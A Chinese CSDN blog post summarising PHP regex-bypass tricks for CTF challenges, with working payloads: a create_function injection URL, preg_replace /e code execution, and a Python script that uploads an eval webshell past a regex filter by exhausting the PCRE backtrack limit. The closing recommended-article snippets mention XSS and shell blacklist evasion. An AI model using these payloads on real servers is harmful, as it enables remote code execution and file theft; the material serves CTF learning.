正则绕过总结

最新推荐文章于 2024-09-30 20:34:31 发布
最新推荐文章于 2024-09-30 20:34:31 发布
阅读量8.1k 收藏 38
点赞数 7
分类专栏: 正则 文章标签: 正则表达式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40327508/article/details/108842617
版权
  1. 换行符绕过(%0a)
<?php

include("flag.php");

highlight_file(__FILE__);

$c = $_GET['c'];

if (preg_match('/^flag$/i', $c) && $c !== 'flag') {
    echo $flag;
}else{
	echo "nonono";
}

在这里插入图片描述2.数组绕过
preg_match只能处理字符串,当传入的subject是数组时会返回false

3.%5c绕过

<?php

$action= $_GET['action'] ? $_GET['action']: '';

$arg= $_GET['arg'] ? $_GET['arg']: '';

if(preg_match('/^[a-z0-9_]*$/isD',$action)) {

	show_source(__FILE__);

}else {

	$action('', $arg);

}

题目要求我们需要绕过正则才可以任意命令执行
正则的意思:/^[a-z0-9_]*$/isD

/i不区分大小写

/s匹配任何不可见字符,包括空格、制表符、换页符等等,等价于[fnrtv]

/D如果使用$限制结尾字符,则不允许结尾有换行;

那么正则匹配的是数字,字母,下划线等开头的值,我们需要找到一个不以数字,字母,下划线等开头的value,同时可以正常执行函数

通过脚本的fuzz我们可以用%5c绕过
最后通过命令执行获取信息

http://127.0.0.1/ctf/1.php?action=\create_function&arg=return%222333%22;}phpinfo();/*

在这里插入图片描述

4.preg_match("/^$/e") (注:php版本需要小于5.5.0)
preg_replace 使用了 /e 模式,导致可以代码执行
例:

<?
highlight_file(__FILE__);
echo preg_replace("/test/e",$_GET["h"],"jutst test");
?>

5.PHP利用PCRE回溯次数限制绕过某些安全限制

2018 Code Breaking,有一道关于php回溯bypass正则的题目:pcrewaf

<?php
function is_php($data){
return preg_match('/<?.*[(`;?>].*/is', $data);
}
if(empty($_FILES)) {
die(show_source(__FILE__));
}
$user_dir = 'data/' . md5($_SERVER['REMOTE_ADDR']);
$data = file_get_contents($_FILES['file']['tmp_name']);
if (is_php($data)) {
echo "bad request";
} else {
@mkdir($user_dir, 0755);
$path = $user_dir . '/' . random_int(0, 10) . '.php';
move_uploaded_file($_FILES['file']['tmp_name'], $path);
header("Location: $path", true, 303);
}

这里主要的问题的是正则的问题

/<?.*[(`;?>].*/is  //这个正则会验证我们上传文件的内容是否有php代码
<?.*匹配php的开头和文件内容  而[(`;?>]匹配php代码的末尾,
但是正则末尾还有.* ——一个贪婪匹配他会继续匹配代码末尾是否还有代码
之后根据ph牛的文章
https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html
我们可以让正则一直回溯知道超出他回溯的上限

在这里插入图片描述而如果超出了上限正则返回的不是0和而是bool(false)
在这里插入图片描述那我们就可以通过脚本从而得到flag

import requests
from io import BytesIO
files = {
'file': BytesIO('<?php eval($_REQUEST[sky]);//'+'a' * 1000000)
}
r = requests.post('http://127.0.0.1/ctf/1.php', files=files, allow_redirects=False)
path = r.headers['Location']
url = 'http://127.0.0.1/ctf/'+path
# print url
data = {
# 'sky':"var_dump(scandir('../../../'));"
'sky':"var_dump(file_get_contents('../../../flag.php'));"
}
r = requests.post(url=url,data=data)
print (r.content)
Lhehe2020
关注
专栏目录
XSS过滤绕过总结_xss绕过字符过滤
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
08-29 1649
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至是普通的HTML。攻击成功后,攻击者可能得到更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。...
php的正则绕过
Hammers_12的博客
09-07 1616
一、空格正则绕过: ${IFS} 但不能写作 $IFS $IFS$9 %09 <> < 二、 在PHP中,在正则绕过时可以利用\包裹住被过滤的函数,以此达到绕过的目的。例如: cat 进黑名单,用 c\a\t 绕过 空格进黑名单,用 ${IFS} 或者 %09 绕过 ✳ 和 flag 都被过滤,用和 ✳ 差不多的 ? 绕过,即 ???,获取四位的 flag ...
正则表达式绕过案例
lin152235的博客
07-21 1152
正则表达式进行绕过,如果要绕过你需要在from前面不要出现不是单词边界,手动加入会报语法错误,所以这里需要考虑mysql中的科学计数法1e1来进行注入绕过,但是还是会出现一个问题就是使用科学计数法来进行查询会占一列,但是前面说到这个users中只有3列超过就会报错,所以直接使用group_concat来进行绕过,因为只能显示3列所以,我们将1,group_concat(…由orderby可以知道这个表一共有3列,那么我们就可以查看2,3列;可以看的出来,第二列存储的是登录密码,第三列是密码。...
CTFshow 命令执行 web29~web36(正则匹配绕过
最新发布
m0_74312676的博客
09-30 1455
web29~36的考点主要是一些常见的正则表达式绕过
正则绕过
v_wus的博客
05-12 1463
正则绕过 一、preg_match() 1.异或绕过 使用异或绕过:可以使用各种特殊字符的异或构造出字母和数字 str = r"~!@#$%^&*()_+<>?,.;:-[]{}\/" for i in range(0, len(str)): for j in range(0, len(str)): a = ord(str[i])^ord(str[j]) print(str[i] + ' ^ ' + str[j] + ' is ' + chr(a
常用的正则表达式
weixin_30394333的博客
07-10 215
基本符号: ^ 表示匹配字符串的开始位置 (例外 用在中括号中[ ] 时,可以理解为取反,表示不匹配括号中字符串) $ 表示匹配字符串的结束位置 * 表示匹配 零次到多次 + 表示匹配 一次到多次 (至少有一次) ? 表示匹配零次或一次 | 表示为或者,两项中取一项 ( ) 小括号表示匹配括号中全部字符 [ ] 中括号表示匹配括号中一个字...
正则表达式案例分析 (一)
weixin_34318326的博客
07-11 295
前言 最近在重新学习正则表达式,把在学习过程中所遇到的案例,还有比较难理解概念用自己的理解分析并整理总结。 如有哪些地方不对,欢迎指正,谢谢!(๑•ᴗ•๑) 本系列使用的JavaScript所支持的正则表达式语法,并推荐你使用 regexr.com/ 去做相应的练习。 假定你已经熟悉元字符,方括号,修饰符,量词及RegExp对象。 如果没有,请先看一遍文档www.w3school.com.cn/j...
正则表达式以及相关案例绕过复现
CYLK1987310466的博客
07-23 589
正则表达式的学习
正则表达式的回溯绕过
m0_63521991的博客
08-05 777
正则表达式的回溯绕过是指通过构造恶意输入,使得正则表达式引擎在匹配字符串时产生大量回溯操作,从而导致性能下降甚至造成拒绝服务(DoS)攻击。由于模式中的量词(例如星号*、加号+、问号?、花括号{}等)使得可能有多种不同的匹配方式,导致引擎需要尝试不同的组合,直到找到匹配的结果。这种尝试的过程就称为回溯。回溯操作会导致时间复杂度呈指数级增长,对于复杂的正则表达式和长字符串,性能损失会非常明显。
正则表达式绕过案例
cao_bo的博客
07-29 588
正则表达式绕过案例
正则表达式绕过案例复现
weixin_50931715的博客
07-26 202
1、正则表达式定义正则表达式描述了一种字符串匹配的模式,可以用来检查一个串是否含有某种子串、将匹配的子串替换或者从某个串中取出符合某个条件的子串等。2、参数匹配字符.匹配任意单个字符,不能匹配空行[]匹配指定范围内的任意单个字符[^]取反[alnum]或[0-9a-zA-Z][alpha]或[a-zA-Z][upper]或[A-Z][lower]或[a-z][blank]空白字符(空格和制表符)[space匹配次数包括0次。...
csrftoken绕过绕过正则表达式
09-08
总结起来,绕过正则表达式绕过csrftoken的验证可以通过使用空referer、指定域绕过或结合其他漏洞攻击等方法来实现。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em...
Papaya:简单的NoSQL注入工具,可通过正则表达式强行强制绕过登录表单并提取用户名和密码
02-02
番木瓜 Papaya是一种工具,用于测试基于MongoDB / NoSQL的Web应用程序是否容易受到POST登录表单上的基本nosql注入的攻击,包括密码和用户名提取的测试。 该攻击通过在密码和用户名上注入nosql的$ regex和$ eq运算符而起作用。 用法 python3 papaya.py TARGET_URL 测试漏洞 如果应用程序容易受到攻击,请在肯定响应中搜索唯一的字符串并将其设置为标识符 选择攻击 依存关系 pip install -r requirements.txt
PHP过滤★等特殊符号的正则
01-20
复制代码 代码如下: if(preg_match(“/[ ‘.,:... 您可能感兴趣的文章:Mysql语法、特殊符号及正则表达式的使用详解Linux中的特殊符号与正则表达式正则表达式中特殊符号及正则表达式的几种方法总结(replace,test,search)
利用正则表达式绕过
lml_0916的博客
07-19 539
这里匹配的时候,以select开头,匹配到了select后,\b匹配的就是边界,\s\S两个在一起使用的话就可以相当于匹配所有字符,“*”匹配0次或者多次;是科学计数法,mysql识别并且单独列出来一列,而且“1e1”可以和from连接在一起使用,系统会认为这是两个命令,所以这样既没有报错,同时也绕过正则。但是也样并没有完全解决。可以看的出来,第二列存储的是登录密码,第三列是密码。由于上面出现的问题,我们想要绕过的话,就不让出现边界,也就是改变from的值(但是要保证是个单词,并且需要延长,还不能报错).
【Flag】-PHP-正则绕过
soldi_er的博客
09-02 2161
文章目录【RCTF2020】calc通用字符集合正则字符替换[a-z]落脚函数参考 最近RCTF分站赛要开始了,梳理一些知识。 【RCTF2020】calc 主要check源码如下 $str = $_GET['num']; $blacklist = ['[a-z]', '[\x7f-\xff]', '\s',"'", '"', "`", '\[', "\]","\$", '_', "\\\\",'\^', ","]; foreach ($blacklist as $blackitem) {
正则表达式绕过
lyz_yyds107的博客
07-29 336
科学计数法,mysql识别并且单独列出来一列,而且“1e1”可以和from连接在一起使用,但是系统会认为这是两个命令,所以这样既没有报错,同时也绕过正则。我们发现不管咋样都能匹配到,所以搜索user可以搜到。我们已经知道了username和password。登录网站127.0.0.1/sqllabs/打开靶场发现因为列不一致,所以引发了报错。还是注入不了,这时候我们就要准备绕过啦。我们就可以用一种语法将第三列变成第四列。这时候我们就发现成功绕过了。查一下user是可以查到的。改成三列后发现没有报错。...
PCRE绕过正则
Aiwin的博客
06-19 1121
PCRE绕过正则和例题[NISACTF 2022]middlerce
正则表达式绕过案例
weixin_55021949的博客
07-20 758
正则表达式
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值